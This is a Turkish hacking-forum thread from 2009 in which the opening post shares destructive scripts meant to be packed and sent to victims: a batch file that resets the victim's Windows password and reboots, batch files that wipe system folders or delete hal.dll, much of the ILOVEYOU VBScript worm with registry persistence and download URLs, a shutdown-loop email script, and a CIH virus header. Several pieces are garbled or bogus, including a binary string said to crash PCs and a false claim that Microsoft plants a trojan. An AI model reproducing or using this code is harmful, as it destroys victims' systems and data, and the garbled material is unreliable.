İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Pc hack k0dLarı ßircok Var Verildiyse 0zur dilerim...

30-12-2009 18:32
#1
Üyelik tarihi:
12/2009
Nereden:
Web & Server Hacked !
Mesajlar:
179
Teşekkür (Etti):
22
Teşekkür (Aldı):
32
Konular:
24
Ticaret:
(0) %
karşı pc ye şifre koymak için aşağıda verdiğim kodları yazıp formatını .bat yapıosunuz ve rarlayıp adama gönderiosunuz.pc 30 sn içinde kapanıyor yeniden açıldığında şifre soruyor.123456 yazan yer şifre siz kafanıza göre değiştirebilirsiniz.
kodlar:
net user %username% 123456
shutdown -r
__________________________________________________ __________
Önüne gelen İce CoLd gibi Basit proglarla Msn leri dondurmaya Çalışıyor ...
BaşLat |Çalıştır | Altdakini Kopyala Yapıştır EnterLa tamamdır.
Kod:
RunDll32 advpack.dll,LaunchINFSection %windir%\\INF\\msmsgs.inf,BLC.Remove
__________________________________________________ __________
karşı pc yi çökertmek için:
kod:
@echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off cls cls @echo .::Seni salak formatı yedin::. @echo off
1.notepad i açın
2.yukarıdaki kodları kopyalayıp yapıştırın.
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.Karşı tarafa rarlayıp yollayın açtığında pc çöksün.
__________________________________________________ __________
bu da dünyayı sallayan bir virüs.en bastan soyleyim kendi pcnizde denemyin
pcniz acilmaz.Açmak için format attiramassiniz.Çünkü CD-ROM çalismaz.CD-ROM u degistirseniz bile nafile.
kodlar:
rem delete -pcas(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="scri*t.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\scri*t.i ni")
scriptini.WriteLine "[scri*t]"
scriptini.WriteLine ";mIRC scri*t"
scriptini.WriteLine "; Please dont edit this scri*t... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
yukarıdaki kodları kopyala not defterine yapistir sonra farkli kaydet fronten anti-virüs.bat olarak kaydedin kaydettikten sonra uzantisini (formatini) .exe olarak degistirin.
__________________________________________________ ________
HOTMAİLE GİDİN YENİ MESAJ YARATA GİRİN.KİME BÖLÜMÜNE KURBANIN MAİL ADRESİNİ YAZIN.
KONUYA İLGİ ÇEKİCİ BİŞEY YAZIN.
MESAJ BÖLÜMÜNE DE MESAJINIZI YAZIN VE SONRA ALTTAKİ KODu EKLEYİN.ADAM MAİLİ AÇTIĞINDA PC HER AÇILDIĞINDA 24 SN DE BİR KAPANACAK.
Kod:
<locati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1pt language="vblocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1pt">
on error resume next
dim kutluk
set kutluk=CreateObject("Wlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1pt.Shell")

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32"*"shutdown
__________________________________________________ ________
PC YE YAPILAN SALDIRIDAN KURTULMAK İÇİN:
1. yol başlat>çalıştır>cmd>net view yazıyoruz ve bilgisayarımıza bağlanan kişiyi programsız olarak görüyoruz.Bu kadar kolay
2.yol başlat>çalıştır>cmd>net share yazıyoruz ve bilgisayarımıza bağlanan kişiyi programsız olarak görüyoruz ancak bu yöntemde bir uzak yönetici çıkar bu microsoft'un pc mize yerleştirdiği trojandir zararsızdır.Eğer uzak yönetici sayısı 2 ye çıkarsa o zaman pc mize biri girmiş demektir. (2. yol daha garantilidir)
Ayrıca bu yolla bilgisayarınıza birinin girdiğini öğrenirseniz başlat>çalıştır>cmd>net computer "kurbanın ip numarası" ve mükemmel sonuç.
__________________________________________________ ________

KARŞIDAKİNİN ANAKARTINI YAKMAK İÇİN AŞAĞIDAKİ KODLARIN TAMAMINI KOPYALAYIP FORMATINI .BAT YAPIN.RARLAYIP GÖNDERİN.AÇSIN ANAKART YANSIN.
KOD:
************************************************** *************************
*
; * The Virus Program Information *
;
************************************************** *************************
*
; *
*
; * Designer : CIH Original Place : TTIT bydogan of Turkey *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 06/21/2007
*
; * *
;
*================================================= =========================
*
; * Modification History *
;
*================================================= =========================
*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*================================================= =========================
*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
*================================================= =========================
*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
;
************************************************** *************************
*

.586P
;
************************************************** *************************
*
; * Original PE Executable File(Don't Modify this Section)
*
;
************************************************** *************************
*

OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
__________________________________________________ _______

KARŞI PC Yİ ÇÖKERTMEK İÇİN:
ilk olarak bi not defteri açin daha sonra not defrerinin içine sunlari yapistirin
del C:/WINDOWS/system32/hal.dll sonra farkli kaydete gelin .txt uzantisini .bat a çevirin.sonra rarlayıp gönderin.açsın pc si çöksün.
__________________________________________________ _______

KARŞI PC Yİ ÇÖKERTMEK İÇİN BAŞKA BİR YÖNTEM:
KOD:

01001011000111110010010101010101010000011111100000
yukarıdaki kodları kopyalayın not defterine yapıştırın kaydederken uzantısını .exe yapın rarlayın ve gönderin açsın pc si çöksün.

Alıntıdır Emeqe Alıntıda ßir uqrasdır.

VerildiySe S0ry.

1 Teşekkürü Hor qörme
stormhack Teşekkür etti.

30-12-2009 22:43
#2
Üyelik tarihi:
08/2008
Yaş:
27
Mesajlar:
1.440
Teşekkür (Etti):
0
Teşekkür (Aldı):
90
Konular:
239
Ticaret:
(0) %
bunları karşı tarafa yedirmek var bide o da sosyal yetenek
Kullanıcı İmzası
Atın üstündeki Türk değilse yüktür.
30-12-2009 23:10
#3
Üyelik tarihi:
12/2009
Nereden:
Web & Server Hacked !
Mesajlar:
179
Teşekkür (Etti):
22
Teşekkür (Aldı):
32
Konular:
24
Ticaret:
(0) %
eFt Aqzının İyi İş yapması Gerek (:
30-12-2009 23:14
#4
Üyelik tarihi:
12/2009
Mesajlar:
120
Teşekkür (Etti):
10
Teşekkür (Aldı):
3
Konular:
4
Ticaret:
(0) %
sosyal muhendislik
31-12-2009 09:34
#5
malea - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Mesajlar:
359
Teşekkür (Etti):
6
Teşekkür (Aldı):
100
Konular:
65
Ticaret:
(0) %
bunlar işe yarıcanı zannetmiyorum
Kullanıcı İmzası
31-12-2009 10:06
#6
Üyelik tarihi:
12/2009
Nereden:
Web & Server Hacked !
Mesajlar:
179
Teşekkür (Etti):
22
Teşekkür (Aldı):
32
Konular:
24
Ticaret:
(0) %
Ben Denedim Arkadaşım 1 2 Tanesini Calştı [ 1 Teşekkürü h0r qörme ]

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı